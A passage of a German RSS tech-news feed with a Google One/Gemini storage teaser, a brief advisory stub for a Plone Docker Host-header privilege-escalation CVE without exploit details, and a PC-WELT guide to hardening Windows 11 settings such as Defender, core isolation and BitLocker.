<content:encoded><![CDATA[<p><img width="640" height="383" src="https://www.googlewatchblog.de/wp-content/uploads/google-one-gemini-1-1024x612.jpg" class="attachment-large size-large wp-post-image" alt="google one gemini" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/google-one-gemini-1-1024x612.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/google-one-gemini-1-300x179.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/google-one-gemini-1-768x459.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/google-one-gemini-1-640x382.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/google-one-gemini-1-800x478.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/google-one-gemini-1.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>In den letzten Monaten sind die Abo-Plattform <a href="https://www.googlewatchblog.de/2026/07/android-google-streicht-das-gratis-backup-jetzt-fuer-alle-nutzer-alle-infos-zu-den-neuen-backup-regeln/"><strong>Google One</strong></a> und das KI-Modell <a href="https://www.googlewatchblog.de/2026/07/gemini-update-jul2026-zwei/"><strong>Gemini</strong></a> enger zusammengerückt, um den Nutzern umfassenden Zugriff auf die KI-Dienste zu geben. Doch während die KI-Zugänglichkeiten ausgebaut worden sind, hat man einen Bereich bisher nicht angetastet - aber das könnte sich ändern: Schon bald könnte Google den KI-Speicherplatz vom Kontingent der Nutzer abziehen.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/07/google-one-gemini-ist-ki-speicherplatz-bald-nicht-mehr-kostenlos-grosse-veraenderungen-deuten-sich-an/">Google One &amp; Gemini: Ist KI-Speicherplatz bald nicht mehr kostenlos? Große Veränderungen deuten sich an</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/e692530f6b7f4d3cabebe4f6bf7dae1d"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/e692530f6b7f4d3cabebe4f6bf7dae1d" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/07/google-one-gemini-ist-ki-speicherplatz-bald-nicht-mehr-kostenlos-grosse-veraenderungen-deuten-sich-an/">Google One &amp; Gemini: Ist KI-Speicherplatz bald nicht mehr kostenlos? Große Veränderungen deuten sich an</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-23055 | Plone Docker Official Image 5.2.13 Header Host privilege escalation]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Plone Docker Official Image 5.2.13. The impacted element is an unknown function of the component Header Handler. The manipulation of the argument Host results in privilege escalation.

This vulnerability is reported as CVE-2024-23055...]]></description>
<link>https://tsecurity.de/de/3661489/sicherheitsluecken/cve-2024-23055-plone-docker-official-image-5213-header-host-privilege-escalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661489/sicherheitsluecken/cve-2024-23055-plone-docker-official-image-5213-header-host-privilege-escalation/</guid>
<pubDate>Sat, 11 Jul 2026 10:08:33 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/plone:docker_official_image">Plone Docker Official Image 5.2.13</a>. The impacted element is an unknown function of the component <em>Header Handler</em>. The manipulation of the argument <em>Host</em> results in privilege escalation.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2024-23055">CVE-2024-23055</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicher und schnell: Diese Windows-Einstellungen sollten Sie sofort anpassen]]></title>
<description><![CDATA[Nach der Installation von oder dem Upgrade auf Windows 11 sollten Sie einige Einstellungen überprüfen und an Ihre Anforderungen anpassen – oder an Empfehlungen von Experten, um die Sicherheit des Betriebssystems zu verbessern. Wir zeigen in diesem Beitrag die wichtigsten Anpassungen, die mit weni...]]></description>
<link>https://tsecurity.de/de/3661389/windows-tipps/sicher-und-schnell-diese-windows-einstellungen-sollten-sie-sofort-anpassen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661389/windows-tipps/sicher-und-schnell-diese-windows-einstellungen-sollten-sie-sofort-anpassen/</guid>
<pubDate>Sat, 11 Jul 2026 08:41:08 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nach der Installation von oder dem Upgrade auf <a href="https://software.pcwelt.de/offer/windows_11_home/43835?x-source=rss" target="_blank" rel="noreferrer noopener">Windows 11 </a>sollten Sie einige Einstellungen überprüfen und an Ihre Anforderungen anpassen – oder an Empfehlungen von Experten, um die Sicherheit des Betriebssystems zu verbessern. Wir zeigen in diesem Beitrag die wichtigsten Anpassungen, die mit wenigen Klicks die Sicherheit maximieren und das Betriebssystem verbessern.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading toc">Explorer anpassen</h2>



<p>Standardmäßig blendet Windows seit Jahren bekannte Dateiendungen aus. Das ist zunächst störend, weil Sie dadurch den korrekten Dateinamen nicht vollständig angezeigt kommen. Dazu kommt die Sicherheitsgefahr. So wird etwa die Datei “wichtiges-dokument.doc.exe” in diesem Fall als “wichtiges-dokument.doc! angezeigt, weil Windows einfach die Dateiendung “exe” ausblendet. </p>



<p>Aus einer ausführbaren Datei, etwa Malware/Ransomware, wird dadurch auf den ersten Blick ein unverdächtiges Worddokument. Das Problem können Sie schnell umgehen, indem Sie im Explorer auf “Anzeigen → Einblenden → Dateinamenerweiterungen” aktivieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704967c"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/dateierweiterungen-einblenden.png" alt="Dateinamenerweiterungen" class="wp-image-2279514" width="847" height="603" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Sie finden die Einstellung in anderen Windows-Versionen auch in den Ordneroptionen auf der Registerkarte “Ansicht” bei “Erweiterungen bei bekannten Dateitypen ausblenden”. In diesem Fall müssen Sie die Option deaktivieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e57049ecd"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/dateierweiterungen-einblenden-02.png" alt="Ansicht-Explorer" class="wp-image-2279516" width="377" height="483" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Bei den Ordneroptionen können Sie dann auch gleich auf der Registerkarte “Allgemein” bei “Datei-Explorer öffnen für” die Option “Dieser PC” auswählen. In diesem Fall startet der Explorer mit der Ansicht der Laufwerke, nicht mit der selten gewünschten “Start-Ansicht”. Die Start-Ansicht können Sie in diesem Fall auch mit einem einzelnen Klick auf “Start” links oben öffnen.</p>



<h2 class="wp-block-heading toc">Windows-Update anpassen</h2>



<p>Nach der Aktualisierung zu Windows 11 oder der Installation des Betriebssystems sollten Sie in den Einstellungen zunächst zu “Windows Update” wechseln. Generell sollten Sie zunächst sicherstellen, dass im oberen Bereich die Meldung “Sie sind auf dem neusten Stand erscheint”. Klicken Sie dennoch auf “Nach Updates suchen” und stellen Sie sicher, dass wirklich alle Updates installiert sind. Über diesen Weg aktualisiert Windows auch die Definitionsdateien des Malwareschutzes.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704a75a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/windows-update-01.png" alt="Windows-Update" class="wp-image-2279518" width="1024" height="757" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Überdies kann es sinnvoll sein, die Option “Erhalten Sie die neuesten Updates, sobald sie verfügbar sind” zu aktivieren. Das stellt sicher, dass Ihr Windows-System Updates schneller erhält als andere Nutzer. Microsoft verteilt viele Aktualisierungen in Wellen. Aktivieren Sie diese Option, können Sie sich in den Wellen etwas vordrängeln.</p>



<p>Klicken Sie darüber hinaus noch auf “Erweiterte Optionen” und aktivieren Sie “Updates für andere Microsoft-Produkte erhalten”. Dadurch stellen Sie sicher, dass auch die anderen Produkte auf Ihrem PC immer aktuell sind.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704af0b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/windows-update-02.png" alt="Windows-Updates anpassen" class="wp-image-2279519" width="1024" height="763" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>An dieser Stelle kann es auch sinnvoll sein bei “Nutzungszeit” festzulegen, wann Sie am PC arbeiten. Das stellt sicher, dass Windows nach der Installation von Updates nicht innerhalb dieser Zeit startet.</p>



<h2 class="wp-block-heading toc">Wichtig: Malware-Schutz</h2>



<p>Rufen Sie nach der Installation von Windows 11 die App “Windows-Sicherheit” aus dem Startmenü auf. Hier sollte bei allen Einstellungen ein grünes Icon mit einem Haken zu sehen sein. Ist das nicht der Fall, überprüfen Sie den Bereich, indem Sie auf das jeweilige Icon klicken.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704b62e"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/sicherheit-01.png" alt="Windows-Sicherheit-01" class="wp-image-2279521" width="922" height="777" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Bei “Gerätesicherheit” sollten Sie darauf achten, dass die Option “Speicher-Integrität” bei “Kernisolierung → Details zu Kernisolierung” aktiviert ist.  Das verhindert erfolgreiche Angriffe durch Malware. Lässt sich diese Option nicht deaktivieren, liegt das an einem veralteten und damit unsicheren Treiber.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704bcb8"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/kern-isolierung.png" alt="Aktivieren der Kern-Isolierung" class="wp-image-2279524" width="923" height="711" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Außerdem sollten Sie darauf achten, dass “Microsoft-Sperrliste gefährdeter Treiber” aktiviert ist. Dadurch lassen sich unsichere Treiber blockieren, über die Angreifer Malware auf dem System einschleusen können.</p>



<h2 class="wp-block-heading toc">Viren- und Bedrohungsschutz anpassen</h2>



<p>In der App Windows-Sicherheit sollten Sie nach der Installation noch zu “Viren- und Bedrohungsschutz” wechseln. Klicken Sie bei “Einstellungen für Viren- und Bedrohungsschutz” auf “Einstellungen verwalten” und achten Sie darauf, dass hier alle Optionen eingeschaltet sind, primär “Echtzeitschutz”, “Cloudbasierter-Schutz” und “Automatische Übermittlung von Beispielen”.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704c5e3"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/malware-schutz.png" alt="Malware-Schutz in Windows optimieren" class="wp-image-2279525" width="1024" height="937" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<h2 class="wp-block-heading toc">Schutzupdates für den Malware-Scanner</h2>



<p>Wichtig ist zudem, dass Sie bei “Updates für Viren- und Bedrohungsschutz” sicherstellen, dass die Sicherheitsinformationen vom aktuellen Tag sind. Mit “Schutzupdates” und dann “Nach Updates suchen” aktualisieren Sie diese direkt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704cd98"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/schutzupdates.png" alt="Schutzupdates in Windows" class="wp-image-2279526" width="883" height="549" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Nutzen Sie einen externen Virenschutz, sind diese Anpassungen nicht notwendig, da dieser den internen Virenschutz in Windows deaktiviert. </p>



<h2 class="wp-block-heading toc">Windows-Aktivierung prüfen</h2>



<p>In den Einstellungen finden Sie über “System → Aktivierung” die Option, ob Windows aktiviert ist. Ohne Aktivierung stellt das Betriebssystem nach einiger Zeit den Betrieb ein und viele Einstellungen sind nicht verfügbar. Hier sehen Sie, ob die Aktivierung funktioniert und können bei Bedarf über “Ändern” Ihren Produktschlüssel für Windows 10 oder Windows 11 neu eintragen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704d5e8"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/aktivierung.png" alt="Windows-Aktivierung" class="wp-image-2279527" width="899" height="667" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Sie erreichen diesen Bereich auch durch Eingabe von “slui” im Suchfeld der Taskleiste.</p>



<h2 class="wp-block-heading toc">Sind alle Treiber installiert?</h2>



<p>Über den Befehl “devmgmt.msc”, den Sie im Suchfeld der Taskleiste eingeben, sehen Sie, ob für alle vorhandenen Geräte im PC auch alle Treiber installiert sind. Wenn hier noch unbekannte oder andere Geräte angezeigt werden, sollten Sie sich beim Hersteller den aktuellen Treiber besorgen und diesen installieren.</p>



<h2 class="wp-block-heading toc">Laufwerksverschlüsselung aktivieren</h2>



<p>Vor allem auf Notebooks sollten Sie darauf achten, dass Sie Bitlocker zur Laufwerksverschlüsselung verwenden. Geben Sie dazu “bitlocker” im Suchfeld der Taskleiste ein und aktivieren Sie den Schutz.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704de1a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/bitlocker.png" alt="Bitlocker schützt Windows" class="wp-image-2279528" width="920" height="583" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Bitlocker steht in Windows 11 Pro und Enterprise zur Verfügung. In Windows 11 Home können Sie stattdessen die Geräteverschlüsselung verwenden. Diese ist in den Einstellungen von Windows 11 zu finden.</p>



<h2 class="wp-block-heading toc">Datenschutz überprüfen</h2>



<p>Wer nach der Installation Bedenken über die getroffenen <strong>Datenschutzeinstellungen </strong>hat, sollte diese prüfen und bei Bedarf ändern.</p>



<p>Dazu rufen Sie die „Einstellungen“- App auf, was am schnellsten mit der Tastenkombination Win-I geht. Die wichtigsten Optionen finden Sie unter „Datenschutz und Sicherheit“. </p>



<p>Es empfiehlt sich, <strong>alle Optionen einmal durchzugehen</strong> und das nach einem Funktionsupgrade zu wiederholen. Teilweise werden Optionen bei einem Upgrade neu gesetzt, außerdem erfolgt nach manchen Funktionsupgrades eine Abfrage der Basiseinstellungen wie bei der Neuinstallation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704e481"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Auf die Finger geschaut: Welche Daten Ihr PC an Microsoft sendet, lässt sich herausfinden. Bedenkliches sollte nicht dabei sein, aber die Übermittlung ist vielleicht trotzdem unerwünscht." class="wp-image-2934451" width="1200" height="713" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Auf die Finger geschaut: Welche Daten Ihr PC an Microsoft sendet, lässt sich herausfinden. Bedenkliches sollte nicht dabei sein, aber die Übermittlung ist vielleicht trotzdem unerwünscht.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Im Vergleich zu Windows 10 sind die Optionen in mehr Rubriken unterteilt und wirken dadurch unübersichtlicher. Sie finden aber die Rubriken wieder, die Sie schon von der Neuinstallation kennen, etwa „Mein Gerät suchen“, „Freihand- und Eingabeanpassung“ sowie „Diagnose und Feedback“.</p>



<p>Letztere bietet die Funktion „Diagnosedaten anzeigen“ für alle, die es genauer wissen wollen. Ist die Option aktiviert, führt ein Klick auf „Diagnosedatenanzeige öffnen“ erst einmal in den Microsoft Store, über den Sie die App Diagnosedatenanzeige installieren müssen. Die zeigt Ihnen dann die gesammelten Daten an. Die Liste ist umfangreich und nicht einfach zu analysieren. </p>



<p>Man kann aber zumindest ermitteln, ob persönliche Daten enthalten sind oder nicht.</p>



